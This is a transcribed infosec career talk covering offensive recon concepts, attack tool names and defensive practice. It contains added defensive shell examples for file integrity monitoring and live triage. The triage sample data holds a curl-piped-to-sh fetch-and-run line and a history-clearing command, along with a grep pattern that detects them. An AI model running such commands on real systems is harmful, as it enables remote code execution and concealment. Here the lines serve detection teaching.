Getting Into InfoSec via Open Source · Daniel Bohannon @danielhbohannon


Post on 08-Jul-2020

Page 1:

Daniel Bohannon

@danielhbohannon

Getting Into InfoSec via Open Source

Page 2:

bash$ who""am''{i..i}

• Daniel Bohannon

• Title :: Principal Applied Security Researcher

• Team :: Advanced Practices Team @Mandiant/@FireEye

• Twitter :: @danielhbohannon

• Blog :: http://danielbohannon.com

COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.

Page 3:

My Career Stack Dump

W: java.lang.Throwable: stack dump

W: at school(undergrad.CompSci:2006-2010)

University of Georgia

W: at job.First(DBadmin:2010-2015)

W: at school(masters.InfoSec:2011-2013)

Georgia Institute of Technology

W: at job.Second(IncidentResponder:2015-2017)

Mandiant, consulting branch of FireEye

W: at job.Second(SecurityResearcher:2017-Present)

FireEye


Page 9:

W: at job.Second(IncidentResponder:2015-2017)

Mandiant, consulting branch of FireEye

W: at job.Second(SecurityResearcher:2017-Present)

FireEye

Sep 2016: DerbyCon

Apr 2017: x33fcon

Jul 2017: Black Hat USA

Mar 2018: Black Hat Asia

Page 10:

WORKSHOP: Developing Resilient Detections (with Obfuscation & Evasion in Mind)

Oct 2018: BruCON


Page 13:

GET /user/goals

• Share my research at conferences while learning from others

• Keep writing and releasing open source code

• BUT…focus more on:

• TEACHING & TRAINING others

• w/o costly conference admission

• LOCAL to the attendees

• Somewhere COMMUNITY is already happening with shared VISION


Page 19:

POST /query?community=hackerspace

https://hackaday.io/prishtinahackerspace

https://oscal.openlabs.cc/oscal17_color_vertical_noyear_rgb_1200_1107/

https://www.flossk.org/img/logo.png

https://www.patreon.com/OpenLabsAlbania


Page 23:

Getting Into InfoSec via Open Source

Page 24:

OUTLINE

bash$ ls -l
total 4
drwxrwxrwx 4 root Offense (Red Team)
drwx------ 4 root Defense (Blue Team)
drwxrw-rw- 4 root Open Source
drw-rw-rw- 4 root Q&A + Brainstorming

Page 25:

OUTLINE

bash$ ls -l *Offense*

Page 26:

bash$ unrar x -e ./offense/

• define:hacking

• /ˈhakiNG/ noun

• the gaining of unauthorized access to data in a system or computer.

• define:hacker

• /ˈhakər/ noun

• a person who uses computers to gain unauthorized access to data.


Page 28:

bash$ unrar x -e ./offense/

• Intention & WRITTEN authorization are the deciding factors

Page 29:

bash$ ls -l ./offense/README.txt

• Attack Lifecycle:

https://www.fireeye.com/content/dam/fireeye-www/blog/images/WMIvsWMI%20tim%20parisi/Fig1.png

Page 30:

bash$ ls -l ./offense/RECON

• OSINT – Open Source INTelligence (passive vs active)

• Fingerprint the target’s:

• Business model (architecture, ethos, recent business news, etc.)

• Technology stacks

• Determine tech & version → Exploit-DB.com → execute exploit

• Search for tech partnerships (“<product> proudly used by <target>”)

• LinkedIn employees’ skills & experience

• Job posting requirements & preferred experience

• Internet scans (Shodan, Censys, etc.) & Google Dorking

• People

Page 31:

https://www.shodan.io/


Page 34:

bash$ ls -l ./offense/RECON

• OSINT – Open Source INTelligence (passive vs active)

• Fingerprint the target’s People:

• Social Media

• Vacation dates, personal & prof associations

• Future connecting points like hobbies, taste in clothing, favorite band, etc.

• Photo metadata

• Physical Eavesdropping

• Frequenting same coffee shop as the target’s employees

• Job posting requirements & preferred experience

• Chris Hadnagy (@humanhacker) → social-engineer.org podcast

• https://www.youtube.com/watch?v=PWVN3Rq4gzw

Page 35:

bash$ ls -l ./offense/COMPROMISE

• Initial code execution in the target’s environment

• RCE – Remote Code Execution

• SQL Injection in mobile or web application

• https://www.hacksplaining.com/exercises/sql-injection#

• Phishing (and Spear Phishing, Vishing, Smishing, etc.)

• Physical access

• Teensy, Raspberry Pi implant, USB drop in parking lot

• How can you easily generate code to exploit a vulnerability on another computer?

• Open source tools, frameworks and entire distros!

Page 36:

bash$ ls -l ./offense/COMPROMISE

• RATs (Remote Access Tools)

• Meterpreter / Metasploit Project (Ruby) [Free & paid versions]

• Empire (PowerShell) / Empyre (Python) [100% open source]

• Cobalt Strike [Closed source & paid]

• Payload generators

• Social Engineering Toolkit (100% open source)

• Unicorn (100% open source)

• Veil (Python) (100% open source)

• DotNetToJScript, SharpShooter, CactusTorch

• Complete distro: Kali Linux (free) https://www.kali.org/


Page 38:

bash$ cat ./offense/RESOURCES | grep "continued learning"

• Red team hacking or penetration testing

• https://www.kali.org/ (Kali Linux distro) + https://kali.training/lessons/introduction/

• CTF (Capture the Flag) – problem solving, onsite & online versions

• https://www.root-me.org/ (best place to start)

• https://vulnhub.com (more advanced, but walkthrough videos are fun)

• Bug Bounty – bug squashing for $$$

• https://bugcrowd.com

• ANYTHING security-related – free video-based training

• https://www.cybrary.it/

Page 39:

OUTLINE

bash$ ls -l *Defense*

Page 40:

bash$ unrar x -e ./defense/

• Just like offense, defense has MANY different areas (technical & non-technical)

• Secure coding practices

• Logging configurations

• Detection development

• SOC (Security Operations Center)

• DFIR (Digital Forensics & Incident Response)

• Policy creation and enforcement

• Personal data privacy & online safety advocates

Page 41:

bash$ ls -l ./defense/

• Secure coding practices

• SQL injection example

• Train developers about common vulnerabilities and secure coding practices

• Develop software for live code auditing to detect common vulnerabilities as code is being developed

Page 42:

bash$ ls -l ./defense/

• Configure logs NOW so you have them when you need them ☺ (which is ALSO now)

• Collecting bash_history

• FIM (File Integrity Monitoring) for web servers' world-readable directories (to detect changes that could be webshells)

• Monitor sudoers file modifications

• Configure auditd logging

• The auditd subsystem provides access monitoring and accounting for Linux; it is developed and maintained by Red Hat.

• Centralize the collection of the logs

• HELK – Hunting ELK (Elasticsearch, Logstash, Kibana)

• https://github.com/Cyb3rWard0g/HELK
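
The file integrity monitoring bullet above, shown as a baseline-and-compare script. This is an added example, not part of the original slides; the function names (`fim_snapshot`, `fim_compare`, `fim_demo`) and the demo web-root files are constructed for illustration.

```shell
# Added example: baseline-and-compare file integrity monitoring for a web root.
# All paths and file contents are constructed for the demo.

# Hash one file with whichever SHA-256 tool is installed.
fim_hash() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# fim_snapshot DIR: print "<sha256><TAB><relative path>" for every regular file.
# Limitation: file names containing tabs or newlines are not handled.
fim_snapshot() {
    ( cd "$1" && find . -type f | LC_ALL=C sort | while IFS= read -r f; do
          printf '%s\t%s\n' "$(fim_hash "$f")" "$f"
      done )
}

# fim_compare BASELINE CURRENT: report files ADDED, MODIFIED or REMOVED
# since the baseline snapshot was taken.
fim_compare() {
    awk -F '\t' '
        FILENAME == ARGV[1] { base[$2] = $1; next }
        { seen[$2] = 1
          if (!($2 in base))       print "ADDED\t" $2
          else if (base[$2] != $1) print "MODIFIED\t" $2 }
        END { for (p in base) if (!(p in seen)) print "REMOVED\t" p }
    ' "$1" "$2" | LC_ALL=C sort
}

# Demo on a throwaway directory standing in for a web root.
fim_demo() {
    work=$(mktemp -d) || return 1
    mkdir -p "$work/www/uploads"
    echo '<?php echo "home"; ?>' > "$work/www/index.php"
    echo '<html>old</html>'      > "$work/www/old.html"
    echo 'body { margin: 0 }'    > "$work/www/site.css"
    fim_snapshot "$work/www" > "$work/baseline.tsv"

    # Simulated changes: a new script in the upload directory, an edited
    # page and a deleted file.
    echo '<?php /* unexpected file */ ?>' > "$work/www/uploads/avatar.php"
    echo '<?php echo "changed"; ?>'       > "$work/www/index.php"
    rm "$work/www/old.html"
    fim_snapshot "$work/www" > "$work/current.tsv"

    fim_compare "$work/baseline.tsv" "$work/current.tsv"
    rm -rf "$work"
}

fim_demo
```

Store the baseline somewhere the web server account cannot write, otherwise whoever changes the web root can also rewrite the baseline.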

Page 43:

bash$ ls -l ./defense/

• Detection development

• Host/Endpoint – YARA (https://github.com/VirusTotal/yara)

• Network – Snort (https://github.com/snort3/snort3)

• Distro – Security Onion (https://github.com/Security-Onion-Solutions/security-onion)

Page 44:

happyHacker.snort

# Alert on any TCP traffic carrying the phrase (case-insensitive) in the first 1000 bytes of payload.
# sid and rev added so that Snort accepts the rule; 1000001 is an arbitrary ID from the local-rule range.
alert tcp any any -> any any (msg:"HAPPY HACKER"; content:"This hackerspace is great!"; depth:1000; nocase; sid:1000001; rev:1;)

happyHacker.yara

// Matches content that contains the first string but not the second (both case-insensitive).
rule HAPPY_HACKER
{
    strings:
        $coolComment = "This hackerspace is great!" nocase
        $lameComment = "Coffee is bad." nocase
    condition:
        $coolComment and not $lameComment
}

Page 45:

bash$ ls -l ./defense/

• SOC (Security Operations Center)

• Responding to alerts and investigating malicious activity in your environment

• “Hunting” through data sets to find malicious activity

• Developing run books and documentation for handling alerts

• Documenting everything you do ☺ (usually in a ticketing system)

Page 46:

bash$ ls -l ./defense/

• DFIR (Digital Forensics & Incident Response)

• Forensic imaging of hard drives (data acquisition)

• Forensic analysis

• Distro: SIFT Workstation (https://digital-forensics.sans.org/community/downloads)

• Live Triaging of suspicious activity

• Active hunting through live data

• List running processes

• grep bash_history file for historical commands

• Query and group all network connections
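
Two of the live-triage steps listed above (grepping bash_history and grouping network connections), run over constructed sample data. This is an added example, not part of the original slides; the function names, the sample `ss -tn` output, the sample history and the pattern list are assumptions chosen for illustration.

```shell
# Added example: two live-triage steps over constructed sample data.
# On a live host, feed the functions `ss -tn` output and a user's ~/.bash_history.

# Constructed sample of `ss -tn` output (documentation address ranges).
sample_ss() {
cat <<'EOF'
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
ESTAB  0      0      10.0.0.5:22         203.0.113.7:51234
ESTAB  0      0      10.0.0.5:48122      198.51.100.23:443
ESTAB  0      0      10.0.0.5:48124      198.51.100.23:443
ESTAB  0      0      10.0.0.5:48130      198.51.100.23:8443
TIME-WAIT 0   0      10.0.0.5:48010      192.0.2.10:80
ESTAB  0      0      10.0.0.5:5432       192.0.2.10:40112
EOF
}

# Constructed sample of a bash_history file.
sample_history() {
cat <<'EOF'
ls -la /var/www/html
curl -s http://198.51.100.23/setup.sh | sh
vi /etc/sudoers.d/deploy
tail -f /var/log/auth.log
unset HISTFILE
EOF
}

# Count established connections per remote address, busiest peer first.
group_connections() {
    awk '$1 == "ESTAB" {
             peer = $5
             sub(/:[0-9]+$/, "", peer)   # drop the port and keep the address
             count[peer]++
         }
         END { for (p in count) printf "%d %s\n", count[p], p }' |
        LC_ALL=C sort -k1,1nr -k2,2
}

# Print "<line number>:<command>" for history entries worth a closer look:
# a download piped into a shell, sudoers edits, and history tampering.
scan_history() {
    grep -nE '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)|/etc/sudoers|unset[[:space:]]+HISTFILE|history[[:space:]]+-c'
}

sample_ss | group_connections
sample_history | scan_history
```

A hit from `scan_history` is a lead to investigate, not a verdict: administrators also edit sudoers and pipe installers into a shell.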

Page 47:

osquery

https://github.com/facebook/osquery

Page 48:

bash$ ls -l ./defense/

• Policy creation and enforcement

• Log management & retention

• Password complexity and aging enforcement

• Mandatory security training

• Personal data privacy & online safety advocates

• Phishing training

• HTTP vs HTTPS, VPN usage, TOR routing

• Password managers & 2FA/MFA (2-Factor Authentication, Multi-Factor Authentication)

• KeePass – audited by the EU Free and Open Source Software Auditing project (EU-FOSSA)

• andOTP (open source)

Page 49:

OUTLINE

bash$ ls -l *Defense*

Page 50:

bash$ unrar x -e ./open_source/

• A GREAT way to get into the InfoSec community is through CONTRIBUTING to open source projects!

• Documentation (most hackers are bad at documentation, wikis, etc.)

• Small bug fixes (or adding language-specific or regional compatibility)

• Porting from Python 2.7 to Python 3.4

• Porting from PowerShell to Python

• Writing blog posts or walkthrough guides for using an open source security tool

• MERGING two tools ☺

• @cobbr_io (Ryan Cobb) merged Invoke-Obfuscation and Empire

Page 51:

OUTLINE

bash$ ls -l *Defense*

Page 52:

bash$ cat ./shutdown.sh

• Thank you very much!!! (Faleminderit shumë!!!)

• Daniel Bohannon

• Twitter :: @danielhbohannon

• Blog :: http://danielbohannon.com

• GitHub: https://github.com/danielbohannon/

• Please feel free to ask me ANYTHING, ANYTIME, ANYWHERE